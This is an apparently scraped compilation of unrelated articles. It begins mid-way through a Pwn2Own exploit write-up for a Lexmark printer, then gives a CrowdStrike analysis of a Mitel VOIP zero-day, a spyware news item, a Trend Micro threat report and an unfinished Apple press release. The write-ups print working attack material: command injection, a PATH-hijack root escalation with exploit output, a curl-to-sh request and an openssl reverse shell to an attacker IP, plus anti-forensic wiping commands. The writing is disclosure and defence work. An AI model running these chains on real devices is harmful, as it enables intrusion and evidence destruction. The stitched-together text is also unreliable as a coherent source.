Before we could start our analysis, we first had to obtain a copy of the firmware. It quickly turned out that the firmware is shipped as an .fls file in a custom binary format containing encrypted data. Luckily, a detailed writeup on the encryption scheme had been published in September 2020. While the writeup did not include code or cryptographic keys, it was elaborate enough that we were able to quickly reproduce it and write our own decrypter. With our firmware decryption tool at hand, we were finally able to peek into the firmware.

It was assumed that the printer would be in a default configuration during the contest and that the setup wizard on the printer had been completed. Thus, we expected the administrator password to be set to an unknown value. In this state, unauthenticated users can still trigger a vast amount of actions through the web interface. One of these is Sanitize all information on nonvolatile memory. It can be found under Settings -> Device -> Maintenance. There are several options to choose from when performing that action:

[x] Sanitize all information on nonvolatile memory
  (x) Start initial setup wizard
  ( ) Leave printer offline
[x] Erase all printer and network settings
[x] Erase all shortcuts and shortcut settings

[Start] [Reset]

If the checkboxes are ticked as shown, the process can be initiated through the Start button. The printer’s non-volatile memory will be cleared and a reboot is initiated. This process takes approximately two minutes. Afterward, unauthenticated users can access all functions through the web interface.

Step #2: Shell Command Injection

After resetting the nvram as outlined in the previous section, the CGI script https://target/cgi-bin/sniffcapture_post becomes accessible without authentication. It was previously discovered by browsing the decrypted firmware and is located in the directory /usr/share/web/cgi-bin.

At the beginning of the script, the supplied POST body is stored in the variable data. Afterward, several other variables such as interfacedestpath and filter are extracted and populated from that data by using sed:

read data

remove=${data/*-r*/1}
if [ "x${remove}" != "x1" ]; then
    remove=0
fi
interface=$(echo ${data} | sed -n 's|^.*-i[[:space:]]\([^[:space:]]\+\).*$|\1|p')
dest=$(echo ${data} | sed -n 's|^.*-f[[:space:]]\([^[:space:]]\+\).*$|\1|p')
path=$(echo ${data} | sed -n 's|^.*-f[[:space:]]\([^[:space:]]\+\).*$|\1|p')
method="startSniffer"
auto=0
if [ "x${dest}" = "x/dev/null" ]; then
    method="stopSniffer"
elif [ "x${dest}" = "x/usr/bin" ]; then
    auto=1
fi
filter=$(echo ${data} | sed -n 's|^.*-F[[:space:]]\+\(["]\)\(.*\)\1.*$|\2|p')
args="-i ${interface} -f ${dest}/sniff_control.pcap"

The variable filter is determined by a quoted string following the value -F specified in the POST body. As shown below, it is later embedded into the args variable in case it has been specified along with an interface:

fmt=""
args=""
if [ ${remove} -ne 0 ]; then
    fmt="${fmt}b"
    args="${args} remove 1"
fi
if [ -n "${interface}" ]; then
    fmt="${fmt}s"
    args="${args} interface ${interface}"
    if [ -n "${filter}" ]; then
        fmt="${fmt}s"
        args="${args} filter \"${filter}\""
    fi
    if [ ${auto} -ne 0 ]; then
        fmt="${fmt}b"
        args="${args} auto 1"
    else
        fmt="${fmt}s"
        args="${args} dest ${dest}"
    fi
fi
[...]

At the end of the script, the resulting args value is used in an eval statement:

[...]
resp=""
if [ -n "${fmt}" ]; then
    resp=$(eval rob call system.sniffer ${method} "{${fmt}}" ${args:1} 2>/dev/null)
    submitted=1
[...]

By controlling the filter variable, attackers are therefore able to inject further shell commands and gain access to the printer as uid=985(httpd), which is the user that the web server is executed as.

Step #3: Privilege Escalation

The printer ships a custom root-owned SUID binary called collect-selogs-wrapper:

# ls -la usr/bin/collect-selogs-wrapper
-rwsr-xr-x. 1 root root 7324 Jun 14 15:46 usr/bin/collect-selogs-wrapper

In its main() function, the effective user ID (0) is retrieved and the process’s real user ID is set to that value. Afterward, the shell script /usr/bin/collect-selogs.sh is executed:

int __cdecl main(int argc, const char **argv, const char **envp)
{
  __uid_t euid; // r0

  euid = geteuid();
  if ( setuid(euid) )
    perror("setuid");
  return execv("/usr/bin/collect-selogs.sh", (char *const *)argv);
}

Effectively, the shell script is executed as root with UID=EUID, and therefore the shell does not drop privileges. Furthermore, argv[] of the SUID binary is passed to the shell script. As the environment variables are also retained across the execv() call, an attacker is able to specify a malicious $PATH value. Any command inside the shell script that is not referenced by its absolute path can thereby be detoured by the attacker.

The first opportunity for such an attack is the invocation of systemd-cat inside sd_journal_print():

# cat usr/bin/collect-selogs.sh
#!/bin/sh
# Collects fwdebug from the current state plus the last 3 fwdebug files from
# previous auto-collections. The collected files will be archived and compressed
# to the requested output directory or to the standard output if the output
# directory is not specified.

sd_journal_print() {
    systemd-cat -t collect-selogs echo "$@"
}

sd_journal_print "Start! params: '$@'"

[...]

The /dev/shm directory can be used to prepare a malicious version of systemd-cat:

$ cat /dev/shm/systemd-cat
#!/bin/sh
mount -o remount,suid /dev/shm
cp /usr/bin/python3 /dev/shm
chmod +s /dev/shm/python3
$ chmod +x /dev/shm/systemd-cat

This script remounts /dev/shm with the suid flag so that SUID binaries can be executed from it. It then copies the system’s Python interpreter to the same directory and enables the SUID bit on it. The malicious systemd-cat copy can be executed as root by invoking the setuid collect-setlogs-wrapper binary like this:

$ PATH=/dev/shm:$PATH /usr/bin/collect-selogs-wrapper

The $PATH environment variable is prepended with the /dev/shm directory that hosts the malicious systemd-cat copy. After executing the command, a root-owned SUID-enabled copy of the Python interpreter is located in /dev/shm:

root@ET788C773C9E20:~# ls -la /dev/shm
drwxrwxrwt    2 root     root           100 Oct 29 09:33 .
drwxr-xr-x   13 root     root          5160 Oct 29 09:31 ..
-rwsr-sr-x    1 root     httpd         8256 Oct 29 09:33 python3
-rw-------    1 nobody   nogroup         16 Oct 29 09:31 sem.netapps.rawprint
-rwxr-xr-x    1 httpd    httpd           96 Oct 29 09:33 systemd-cat

The idea behind this technique is to establish a simple way of escalating privileges without having to exploit the initial collect_selogs_wrapper SUID again. We did not use the Bash binary for this, as the version shipped with the printer seems to ignore the -p flag when running with UID!=EUID.

Exploit

An exploit combining the three vulnerabilities to gain unauthenticated code execution as root  has been implemented as a Python script. First, the exploit tries to determine whether the printer has a login password set (i.e., setup wizard has been completed) or it is password-less (i.e., authentication reset already executed earlier or setup wizard not yet completed). Depending on the result, it decides whether the non-volatile memory reset is required.

If the non-volatile memory reset is triggered, the exploit waits for the printer to finish rebooting. Afterward, it continues with the shell command injection step and escalation of privileges. The privileged access is then used to start an OpenSSH daemon on the printer. To finish, the exploit establishes an interactive SSH session with the printer and hands control over to the user. An example run of the exploit in a testing environment follows:

$ ./mc3224i_exploit.py https://10.64.23.20/ sshd
[*] Probing device...
[+] Firmware: CXLBL.075.281
[+] Acceptable login methods: ['LDAP_DEVICE_REALM',        
    'LOGIN_METHODS_WITH_CREDS']
[*] Device IS password protected, auth bypass required
[*] Erasing nvram...
[+] Success! HTTP status: 200, rc=1
[*] Waiting for printer to reboot, sleeping 5 seconds...
[*] Checking status...
xxxxxxxxxxxxxxxxxxxxxxx!
[+] Reboot finished
[*] Probing device...
[+] Firmware: CXLBL.075.281
[+] Acceptable login methods: ['LDAP_DEVICE_REALM']
[*] Device IS NOT password protected
[+] Authentication bypass done
[*] Attempting to escalate privileges...
[*] Executing command (root? False):
    echo -e '#!/bin/sh\\n
    mount -o remount,suid /dev/shm\\n
    cp /usr/bin/python3 /dev/shm\\nchmod +s /dev/shm/python3' >
    /dev/shm/systemd-cat; chmod +x /dev/shm/systemd-cat
[+] HTTP status: 200
[*] Executing command (root? False): PATH=/dev/shm:$PATH /usr/bin/collect-selogs-wrapper
[+] request timed out, that’s what we expect
[+] SUID Python interpreter should be created
[*] Attempting to enable SSH daemon...
[*] Executing command (root? True):
sed -Ee 's/(RSAAuthentication|UsePrivilegeSeparation|UseLogin)/#\\1/g'
    -e 's/AllowUsers guest/AllowUsers root guest/'
    /etc/ssh/sshd_config_perf > /tmp/sshconf;
    mkdir /var/run/sshd;
    iptables -I INPUT 1 -p tcp --dport 22 -j ACCEPT;
    nohup /usr/sbin/sshd -f /tmp/sshconf &
[+] HTTP status: 200
[+] SSH daemon should be running
[*] Trying to call ssh... ('ssh', '-i', '/tmp/tmpd2vc5a2u', 'root@10.64.23.20')
root@ET788C773C9E20:~# id
uid=0(root) gid=0(root) groups=0(root)

Summary

In this blog, we described a number of vulnerabilities that can be exploited from the local network to bypass authentication, execute arbitrary shell commands, and elevate privileges on a Lexmark MC3224i printer. The research started as an experiment after the announcement of the Pwn2Own Austin 2021. The team enjoyed the challenge, as well as participating in Pwn2Own for the first time, and we welcome your feedback. We’d also like to invite you to read about the other device we successfully targeted during Pwn2Own Austin 2021, the Cisco RV340 router.

Additional Resources

The Call Is Coming from Inside the House: CrowdStrike Identifies Novel Exploit in VOIP Appliance

  • CrowdStrike Services recently performed an investigation that identified a compromised Mitel VOIP appliance as the threat actor’s entry point. 
  • The threat actor performed a novel remote code execution exploit on the Mitel appliance to gain initial access to the environment.
  • CrowdStrike identified and reported the vulnerability to Mitel, and CVE-2022-29499 was created.
  • The threat actor performed anti-forensic techniques on the VOIP appliance in an attempt to hide their activity.

Background

CrowdStrike Services recently investigated a suspected ransomware intrusion attempt. The intrusion was quickly stopped through the customer’s efforts and those of the CrowdStrike Falcon Complete™ managed detection and response (MDR) team, which was supporting this customer’s environment. CrowdStrike determined that all of the identified malicious activity had originated from an internal IP address associated with a device that did not have the CrowdStrike Falcon® sensor installed on it. Further investigation revealed that this source device was a Linux-based Mitel VOIP appliance sitting on the network perimeter; the availability of supported security or endpoint detection and response (EDR) software for these devices is highly limited. 

The device was taken offline and imaged for further analysis, leading to the discovery of a novel remote code execution exploit used by the threat actor to gain initial access to the environment. Thanks to close and immediate work with the Mitel product security incident response team (PSIRT) team, this was identified as a zero-day exploit and patched. The vulnerability was assigned CVE-2022-29499, and the associated security advisory can be found here.

Discovery and Anti-Forensic Techniques

After tracing threat actor activity to an IP address assigned to the Mitel MiVoice Connect VOIP appliance, CrowdStrike received a disk image of the Linux system and began analysis. CrowdStrike’s analysis identified anti-forensic techniques that were performed by the threat actor on the Mitel appliance in an attempt to hide their activity. Given the close proximity in time between the earliest and most recent dates of activity, it was likely that the threat actor attempted to wipe their activity on the Mitel appliance after Falcon Complete detected their activity and prevented them from moving laterally. 

Although the threat actor deleted all files from the VOIP device’s filesystem, CrowdStrike was able to recover forensic data from the device. This included the initial undocumented exploit used to compromise the device, the tools subsequently downloaded by the threat actor to the device, and even evidence of specific anti-forensic measures taken by the threat actor. 

Beyond removing files, the threat actor attempted to overwrite free space on the device. A recovered nohup.out file (generated by running a command via nohup) contained the following:

rm: cannot remove '/cf/swapfile': Operation not permitted
dd: error writing '/tmp/2': No space left on device
10666+0 records in
10665+0 records out
11183382528 bytes (11 GB) copied, 81.3694 s, 137 MB/s

The messages in the recovered file indicated two things. First, the error for the rmcommand failing to delete the swap file demonstrated that rm was used as part of the nohup command. The original rm command run via nohup was likely designed to delete all files, but failed on the swapfile due to it being active, resulting in the error message. 

Second, the threat actor used the dd2 command to attempt to create a file (/tmp/2) that, because of its size, would overwrite all of the free space on the device (and indeed did, based on the dd error message “No space left on device”). This anti-forensic measure would have been taken to prevent recovery of data deleted via the initial rm command. However, in this instance, /tmp was on a separate partition than that storing HTTP access logs. While the log files were also deleted via the rm command, the free space that contained their contents was not overwritten, allowing the file contents to be recovered. These recovered HTTP access logs included evidence of the exploit used to compromise the device.

Exploit Details

The exploit involved two GET requests. The first request targeted a get_url parameter of a php file, populating the parameter with a URL to a local file on the device. This caused the second request to originate from the device itself, which led to exploitation. This first request was necessary because the actual vulnerable URL was restricted from receiving requests from external IP addresses. By first targeting the get_url parameter, the actual exploit request to the vulnerable page came from the local system.

Note that the threat actor IP addresses have been replaced with invalid IPs 1.1.256.1 and 2.2.256.2 below. The URL-encoded portion at the end of the request below decodes to $PWD|sh|?.

Request #1:

1.1.256.1 - - [01/Mar/2022:01:25:17 -TZ] "GET /scripts/vtest.php?get_url=http://127.0.0.1/ucbsync.php%3fcmd=syncfile:db_files/favicon.ico:2.2.256.2/%24%50%57%44%7c%73%68%7c%3f HTTP/1.1" 200 40

The second request included command injection that would cause the system to perform an HTTP GET request to attacker-controlled infrastructure, and then pipe the results of the request locally to sh.3 This would allow execution of whatever commands were stored on the attacker’s server at the requested URL. This vulnerability was caused by the PHP file in question splitting up the parameters for the syncfile command, one of which would subsequently be used by the appliance in a curl command. Because the request came from localhost — by first sending the request to the file with the get_url parameter — it was allowed. The request is shown below.

Request #2:

127.0.0.1 - - [01/Mar/2022:01:25:17 -TZ]  "GET /ucbsync.php?cmd=syncfile:db_files/favicon.ico:2.2.256.2/$PWD|sh|? HTTP/1.0" 200 -

In addition to recovering the logs, CrowdStrike recovered the contents of two outbound HTTP requests from the appliance to the attacker’s infrastructure. These outbound requests were both caused by the second request shown above. The responses to the outbound requests were also recovered, which demonstrated that the attacker used the exploit to create a reverse shell.

The first outbound request returned valid json related to the application to reach the vulnerable section of code.

Outbound request and response #1:

GET /$PWD|sh|?/ucbsync.php?cmd=manifest HTTP/1.1
Host: 2.2.256.2
Accept: */*
HTTP/1.0 200 OK
Server: SimpleHTTP/0.6 Python/3.8.10
Date: Tue, 01 Mar 2022 01:25:17 GMT
Content-type: text/html
 
{"db_files":[{"name":"exmaple0.jpg","size":55318,"date":000000000},{"name":"default_logo.jpg","size":4181,"date":0000000000},{"name":"favicon.ico","size":4364,"date":0000000000},{"name":"example1.jpg","size":73553,"date":0000000000},{"name":"example1.jpg","size":35299,"date":0000000000},{"name":"example2.jpg","size":58617,"date":0000000000},{"name":"default_banner.jpg","size":3148,"date":0000000000},{"name":"example2.jpg","size":63954,"date":0000000000},{"name":"example2.jpg","size":48666,"date":0000000000},{"name":"example3.jpg","size":65224,"date":0000000000},{"name":"example3.jpg","size":39322,"date":0000000000},{"name":"example4.jpg","size":34328,"date":0000000000},{"name":"example5.jpg","size":41095,"date":0000000000},{"name":"example6.jpg","size":43450,"date":0000000000},{"name":"example5.jpg","size":52095,"date":0000000000},{"name":"example7.jpg","size":8331,"date":0000000000}]}

The second outbound request showed the remote execution in action. The following recovered outbound GET request to /shoretel/wc2_deploy (hosted on the threat actor’s external infrastructure) included the payload in its response: an SSL-enabled reverse shell created via the mkfifo command and openssl s_client.

Outbound request and response #2:

GET //shoretel/wc2_deploy HTTP/1.1
User-Agent: curl/7.29.0
Host: 2.2.256.2
Accept: */*
HTTP/1.0 200 OK
Server: SimpleHTTP/0.6 Python/3.8.10
Date: Tue, 01 Mar 2022 01:25:17 GMT
Content-type: text/html
 
mkfifo /tmp/.svc_bkp_1; /bin/sh -i < /tmp/.svc_bkp_1 2>&1 | openssl s_client -quiet -connect 2.2.256.2:443 > /tmp/.svc_bkp_1; rm /tmp/.svc_bkp_1

In other words, the threat actor had a webserver (via the Python SimpleHTTP module) running on infrastructure they controlled. On this webserver was a file named wc2_deploy that contained the mkfifo command shown above. Because the threat actor’s exploit request involved reaching out to this URL and piping the response to sh, this would cause the reverse shell command to be executed upon exploitation.

Leveraging first in, first out (FIFO) pipes is a common technique to create a reverse shell. Often, shells created in this manner will use netcat instead of openssl s_client, but the functionality is the same, except that openssl s_client will use ssl and netcat will typically be plaintext.

Post-Exploitation Activity

Once the reverse shell was established, the threat actor created what appeared to be a webshell named pdf_import.php. The contents of pdf_import.php were not recovered; however, it was not a standard file name for the device, and a recovered log file included a POST request to the file that originated from the same IP address that the exploit requests originated from.

1.1.256.1 - - [1/Mar/2022:06:36:04 -0500] "POST /vhelp/pdf/pdf_import.php HTTP/1.1" 200 2

The threat actor also downloaded the tunneling/proxy tool Chisel onto the VOIP appliance, renamed it memdump and executed it. This binary acted as a reverse proxy to allow the threat actor to pivot further into the environment via the VOIP device. The execution of Chisel, as well as the POST request to pdf_import.php, both directly corresponded with malicious activity detected and blocked by Falcon Complete on internal devices, suggesting that the threat actor used both tools to attempt to move laterally into the environment.

Conclusion

Timely patching is critical to protect perimeter devices. However, when threat actors exploit an undocumented vulnerability, timely patching becomes irrelevant. That’s why it’s crucial to have multiple layers of defense, such as Falcon Complete MDR, which performs threat monitoring and remediation of malicious activity 24/7. Critical assets should be isolated from perimeter devices to the extent possible. Ideally, if a threat actor compromises a perimeter device, it should not be possible to access critical assets via “one hop” from the compromised device. In particular, it’s critical to isolate and limit access to virtualization hosts or management servers such as ESXi and vCenter systems as much as possible. This can involve jump-boxes, network segmentation and/or multifactor authentication (MFA) requirements. 

Having an up-to-date and accurate asset inventory is also critically important, as you can’t protect something if you don’t know it exists. In addition, it’s important to ensure all service accounts are managed and accounted for, and that the capability exists to detect abnormal account usage. CrowdStrike Falcon Identity Protection can provide such insight by alerting on stale account usage as well as when accounts are associated with abnormal source or destination systems — and even forcing MFA challenges for users accessing critical assets.

Endnotes

  1. Linux command to remove files or directories
  2. Linux command to convert and copy files
  3. Linux command to spawn a shell or terminal prompt

Additional Resources

Google Says ISPs Helped Attackers Infect Targeted Smartphones with Hermit Spyware

A week after it emerged that a sophisticated mobile spyware dubbed Hermit was used by the government of Kazakhstan within its borders, Google said it has notified Android users of infected devices.

Additionally, necessary changes have been implemented in Google Play Protect — Android’s built-in malware defense service — to protect all users, Benoit Sevens and Clement Lecigne of Google Threat Analysis Group (TAG) said in a Thursday report.

Hermit, the work of an Italian vendor named RCS Lab, was documented by Lookout last week, calling out its modular feature-set and its abilities to harvest sensitive information such as call logs, contacts, photos, precise location, and SMS messages.

Once the threat has thoroughly insinuated itself into a device, it’s also equipped to record audio and make and redirect phone calls, in addition to abusing its permissions to accessibility services to keep tabs on the foreground apps used by the victims.

Its modularity also enables it to be wholly customizable, equipping the spyware’s functionality to be extended or altered at will. It’s not immediately clear who were targeted in the campaign, or which of RCS Lab clients were involved.

The Milan-based company, operating since 1993, claims to provide “law enforcement agencies worldwide with cutting-edge technological solutions and technical support in the field of lawful interception for more than twenty years.” More than 10,000 intercepted targets are purported to be handled daily in Europe alone.

“Hermit is yet another example of a digital weapon being used to target civilians and their mobile devices, and the data collected by the malicious parties involved will surely be invaluable,” Richard Melick, director of threat reporting for Zimperium, said.

The targets have their phones infected with the spy tool via drive-by downloads as initial infection vectors, which, in turn, entails sending a unique link in an SMS message that, upon clicking, activates the attack chain.

It’s suspected that the actors worked in collaboration with the targets’ internet service providers (ISPs) to disable their mobile data connectivity, followed by sending an SMS that urged the recipients to install an application to restore mobile data access.

“We believe this is the reason why most of the applications masqueraded as mobile carrier applications,” the researchers said. “When ISP involvement is not possible, applications are masqueraded as messaging applications.”

To compromise iOS users, the adversary is said to have relied on provisioning profiles that allow fake carrier-branded apps to be sideloaded onto the devices without the need for them to be available on the App Store.

Google

An analysis of the iOS version of the app shows that it leverages as many as six exploits — CVE-2018-4344CVE-2019-8605CVE-2020-3837CVE-2020-9907CVE-2021-30883, and CVE-2021-30983 — to exfiltrate files of interest, such as WhatsApp databases, from the device.

“As the curve slowly shifts towards memory corruption exploitation getting more expensive, attackers are likely shifting too,” Google Project Zero’s Ian Beer said in a deep-dive analysis of an iOS artifact that impersonated the My Vodafone carrier app.

On Android, the drive-by attacks require that victims enable a setting to install third-party applications from unknown sources, doing so which results in the rogue app, masquerading as smartphone brands like Samsung, requests for extensive permissions to achieve its malicious goals.

The Android variant, besides attempting to root the device for entrenched access, is also wired differently in that instead of bundling exploits in the APK file, it contains functionality that permits it to fetch and execute arbitrary remote components that can communicate with the main app.

“This campaign is a good reminder that attackers do not always use exploits to achieve the permissions they need,” the researchers noted. “Basic infection vectors and drive by downloads still work and can be very efficient with the help from local ISPs.”

Stating that seven of the nine zero-day exploits it discovered in 2021 were developed by commercial providers and sold to and used by government-backed actors, the tech behemoth said it’s tracking more than 30 vendors with varying levels of sophistication who are known to trade exploits and surveillance capabilities.

What’s more, Google TAG raised concerns that vendors like RCS Lab are “stockpiling zero-day vulnerabilities in secret” and cautioned that this poses severe risks considering a number of spyware vendors have been compromised over the past ten years, “raising the specter that their stockpiles can be released publicly without warning.”

“Our findings underscore the extent to which commercial surveillance vendors have proliferated capabilities historically only used by governments with the technical expertise to develop and operationalize exploits,” TAG said.

“While use of surveillance technologies may be legal under national or international laws, they are often found to be used by governments for purposes antithetical to democratic values: targeting dissidents, journalists, human rights workers and opposition party politicians.”

Source :
https://thehackernews.com/2022/06/google-says-isps-helped-attackers.html

Trend Micro Cloud App Security Threat Report 2021

In this report, we highlight the notable email threats of 2021, including over 33.6 million high-risk email threats (representing a 101% increase from 2020’s numbers) that we’ve detected using the Trend Micro Cloud App Security platform.

Email is an integral cog in the digital transformation machine. This was especially true in 2021, when organizations found themselves trying to keep business operations afloat in the middle of a pandemic that has forever changed how people work. At a time when the workplace had already largely shifted from offices to homes, malicious actors continued to favor email as a low-effort yet high-impact attack vector to disseminate malware.

Email is not only popular among cybercriminals for its simplicity but also for its efficacy. In fact, 74.1% of the total threats blocked by Trend Micro in 2021 are email threats. Meanwhile, the 2021 Internet Crime Report by the FBI’s Internet Crime Complaint Center (IC3) states that there was “an unprecedented increase in cyberattacks and malicious cyber activity” last year, with business email compromise (BEC) being among the top incidents.

In this report, we discuss the notable email threats of 2021 based on the data that we’ve gathered using the Trend Micro™ Cloud App Security™, a security solution that supplements the preexisting security features in email and collaboration platforms.

Download our infographic

Malware detections surge as attacks become more elaborate, targeted

The Trend Micro Cloud App Security solution detected and thwarted a total of 3,315,539 total malware files in 2021. More urgently, this number represents an increase of a whopping 196% from 2020’s numbers. There were also huge spikes in both known and unknown malware detections in 2021 at 133.8% and 221%, respectively.

Cybercriminals worked overtime to attach malware in malicious emails in 2021 using advanced tactics and social engineering lures. In January, we saw how Emotet sent spam emails that used hexadecimal and octal representations of IP addresses for detection evasion in its delivery of malware such as TrickBot and Cobalt Strike.

In May last year, we reported on Panda Stealer, an information stealer that targets cryptocurrency wallets and credentials via spam emails. We also shared an update on APT-C-36 (aka Blind Eagle), an advanced persistent threat (APT) group targeting South American entities using a spam campaign that used fraudulent emails impersonating Colombia’s national directorate of taxes and customs and even fake infidelity email lures.

QAKBOT operators also resumed their spam campaign in late 2021 after an almost three-month hiatus and abused hijacked email threads to lead victims to both QAKBOT and the SquirrelWaffle malware loader.

Meanwhile, ransomware detections continued to decline in 2021, a consistent trend that we have been seeing in previous years. Last year, the Trend Micro Cloud App Security solution detected and blocked 101,215 ransomware files — a 43.4% decrease compared to 2020’s detections.

The reason behind this continuing decline is possibly two-fold: One, unlike legacy ransomware that focuses on the quantity of victims, modern ransomware focuses on waging highly targeted and planned attacks to yield bigger profits. Since today’s ransomware actors no longer abide by the spray-and-pray ransomware model, the number of attacks are no longer as massive as the number that we witnessed in ransomware’s early days. We identified the other reason in our year-end roundup report: That is, it’s possible that ransomware detections are down because our cybersecurity solutions continue to block an increasing number of ransomware affiliate tools each year, including TrickBot and BazarLoader. This could have prevented ransomware attacks from being successfully executed on victim environments.

Known, unknown, and overall credential phishing attacks rose in 2021

Based on Trend Micro Cloud App Security data, 6,299,883 credential phishing attacks were detected and blocked in 2021, which accounts for a 15.2% overall increase. Similar to last year, the number of known credential phishing attacks is greater than the unknown ones. However, this year, the percentage of increase is at a staggering 72.8%.

When comparing 2020 and 2021’s numbers, we saw an 8.4% increase in the number of detections for known credential phishing links, while a 30% growth is observed in the number of detections for unknown credential phishing links.

Abnormal Security noted the increase in overall credential phishing attacks in one 2021 report and stated that credential phishing is attributed to 73% of all advanced threats that they’ve analyzed.

We have also documented the rise in credential phishing attacks from previous years. In fact, in the first half of 2019, the Trend Micro Cloud App Security solution detected and blocked 2.4 million credential phishing attacks alone.

BEC’s small numbers bring big business losses

The Trend Micro Cloud App Security solution intercepted a total of 283,859 BEC attacks in 2021. Compared with 2020’s BEC detections, this number represents a 10.61% decrease. Interestingly, there is an 82.7% increase in this year’s BEC attacks that were detected using Writing Style DNA, while there is a 38.59% decrease in attacks that have been blocked using the antispam engine.

Overall, BEC numbers have consistently been on a downward trend since 2020. But the reduction in BEC victims doesn’t equate to a dip in cybercriminal profits. According to the FBI’s IC3, BEC accounted for US$2.4 billion in adjusted losses for both businesses and consumers in 2021. According to the same organization, BEC losses have reached over US$43 billion between June 2016 and December 2021 for both domestic and international incidents.

We have also observed how BEC actors continuously tweak their tactics for ill gain. In August last year, our telemetry showed a gradual increase in BEC detections. Upon investigation, we discovered that instead of impersonating company executives and upper management personnel, this BEC-related email campaign impersonated and targeted ordinary employees for money transfers and bank payroll account changes.

Covid-19 lures, cybercriminal campaigns behind massive jump in phishing numbers

The Trend Micro Cloud App Security solution data shows that a total of 16,451,166 phishing attacks were detected and blocked in 2021. This is a 137.6% growth from 2020’s phishing numbers.

In contrast to last year’s numbers, we saw a significant jump in phishing attacks detected via spam count this year — a whopping 596% increase, to be specific. Meanwhile, we observed a notable 15.26% increase in credential phishing count compared to last year.

These high numbers reflect organizations’ sentiments about phishing attacks. According to a survey in an Osterman Research report titled “How to Reduce the Risk of Phishing and Ransomware,” organizations were “concerned” or “extremely concerned” about phishing attempts making their way to end users and employees failing to spot phishing and social engineering attacks before accessing a link or attachment.

While they kicked off majority of Covid-19-related phishing emails and sites in 2020, cybercriminals still exploited the global pandemic for financial gain. Last year, Mexico-based medical laboratory El Chopo shared that a fraudulent website that looked identical to the company’s had been launched. On that website, users could schedule a vaccination appointment after paying MXN2,700 (approximately US$130). To make the fake website appear credible, the malicious actors behind it added fake contact information such as email addresses and social media pages that victims can use for inquiries.

Early last year, we reported on a wave of phishing emails that pretended to be coming from national postal systems. This campaign attempted to steal credit card numbers from 26 countries. We also investigated a spear-phishing campaign that used Pegasus spyware-related emails to lead victims into downloading a file stealer. This campaign targeted high-ranking political leaders, activists, and journalists in 11 countries.

Protect emails, endpoints, and cloud-based services and apps from attacks with Trend Micro Cloud App Security

Organizations should consider a comprehensive multilayered security solution such as Trend Micro Cloud App Security. It supplements the preexisting security features in email and collaboration platforms like Microsoft 365 and Google Workspace (formerly known as G Suite) by using machine learning (ML) to analyze and detect any suspicious content in the message body and attachments of an email. It also acts as a second layer of protection after emails and files have passed through Microsoft 365 or Gmail’s built-in security.

Trend Micro Cloud App Security uses technologies such as sandbox malware analysis, document exploit detection, and file, email, and web reputation technologies to detect malware hidden in Microsoft 365 or PDF documents. It provides data loss prevention (DLP) and advanced malware protection for Box, Dropbox, Google Drive, SharePoint Online, OneDrive for Business, and Salesforce while also enabling consistent DLP policies across multiple cloud-based applications. It also offers seamless integration with an organization’s existing cloud setup, preserving full user and administrator functionality, providing direct cloud-to-cloud integration through vendor APIs, and minimizing the need for additional resources by assessing threat risks before sandbox malware analysis.

Trend Micro Cloud App Security stands on the cutting edge of email and software-as-a-service (SaaS) security, offering ML-powered features that combat two of the primary email-based threats: BEC and credential phishing. Writing Style DNA can help determine if an email is legitimate by using ML to check a user’s writing style based on past emails and then comparing suspicious emails against it. Computer vision, on the other hand, combines image analysis and ML to check branded elements, login forms, and other site content. It then pools this information with site reputation elements and optical character recognition (OCR) to check for fake and malicious sites — all while reducing instances of false positives to detect credential phishing email.

This security solution also comes with an option to rescan historical URLs in users’ email metadata and perform continued remediation (automatically taking configured actions or restoring quarantined messages) using newer patterns updated by Web Reputation Services.

This is a significant option since users’ email metadata might include undetected suspicious or dangerous URLs that have only recently been discovered. The examination of such metadata is thus an important part of forensic investigations that help determine if your email service has been affected by attacks. This solution also officially supports the Time-of-Click Protection feature to protect Exchange Online users against potential risks when they access URLs in incoming email messages.

Trend Micro Cloud App Security also comes with the advanced and extended security capabilities of Trend Micro XDR, providing investigation, detection, and response across your endpoints, email, and servers.

Source :
https://www.trendmicro.com/vinfo/us/security/research-and-analysis/threat-reports/roundup/trend-micro-cloud-app-security-threat-report-2021

macOS Ventura adds powerful productivity tools and new Continuity features that make the Mac experience better than ever

CUPERTINO, CALIFORNIA Apple today previewed macOS Ventura, the latest version of the world’s most advanced desktop operating system, which takes the Mac experience to a whole new level. Stage Manager gives Mac users an all-new way to stay focused on the task in front of them while seamlessly switching between apps and windows. Continuity Camera uses iPhone as the webcam on Mac to do things that were never possible before,1 and with Handoff coming to FaceTime, users can start a FaceTime call on their iPhone or iPad and fluidly pass it over to their Mac. Mail and Messages come with great new features that make the apps better than ever, while Safari — the world’s fastest browser on Mac2 — ushers in a passwordless future with passkeys. And with the power and popularity of Apple silicon, and new developer tools in Metal 3, gaming on Mac has never been better.

“macOS Ventura includes powerful features and new innovations that help make the Mac experience even better. New tools like Stage Manager make focusing on tasks and moving between apps and windows easier and faster than ever, and Continuity Camera brings new videoconferencing features to any Mac, including Desk View, Studio Light, and more,” said Craig Federighi, Apple’s senior vice president of Software Engineering. “With helpful new features in Messages, state-of-the-art search technologies in Mail, and an updated design for Spotlight, Ventura has so much to offer and enriches many of the ways customers use their Macs.”

The new Stage Manager feature stacking several app windows to the left of the Safari window on the 14-inch MacBook Pro.
iPhone 13 Pro being used as a webcam with Continuity Camera on the new 13-inch MacBook Pro.
  • previous
  • next

A New Way to Work Across Apps and Windows

Stage Manager automatically organises open apps and windows so users can concentrate on their work and still see everything in a single glance. The current window users are working in is displayed prominently in the center, and other open windows appear on the left-hand side so they can quickly and easily switch between tasks. Users can also group windows together when working on specific tasks or projects that require different apps. Stage Manager works in concert with other macOS windowing tools — including Mission Control and Spaces — and users can now easily get to their desktop with a single click.

Pause playback of video: Stage Manager in macOS Ventura

Stage Manager automatically arranges open windows and puts the app the user is currently working with front and center.

Apple Devices Working Together with Continuity

Continuity Camera now gives Mac customers the ability to use their iPhone as a webcam, and unlocks new capabilities that were never possible before on a webcam. With the power of Continuity, Mac can automatically recognise and use the camera on iPhone when it is nearby — without the need to wake or select it — and iPhone can even connect to Mac wirelessly for greater flexibility.3 Continuity Camera delivers innovative features to all Mac computers including Center Stage, Portrait mode, and the new Studio Light — an effect that beautifully illuminates a user’s face while dimming the background. Plus, Continuity Camera taps into the Ultra Wide camera on iPhone to enable Desk View, which simultaneously shows the user’s face and an overhead view of their desk — great for creating DIY videos, showing off sketches over FaceTime, and so much more.4

iPhone 13 Pro on MacBook Pro being used as a webcam.

Handoff now comes to FaceTime, allowing users to start a FaceTime call on one Apple device and seamlessly transfer it to another Apple device nearby. Users can be on a FaceTime call on iPhone or iPad, then move the call to their Mac with just a click, or start a call on their Mac and shift to iPhone or iPad when they need to continue on the go.

